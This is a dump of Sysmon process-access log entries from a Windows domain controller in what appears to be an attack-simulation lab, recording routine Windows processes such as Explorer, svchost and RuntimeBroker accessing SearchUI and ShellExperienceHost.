07:54:44.505{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001049736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.505{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.505{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.490{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.490{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.490{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4
.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
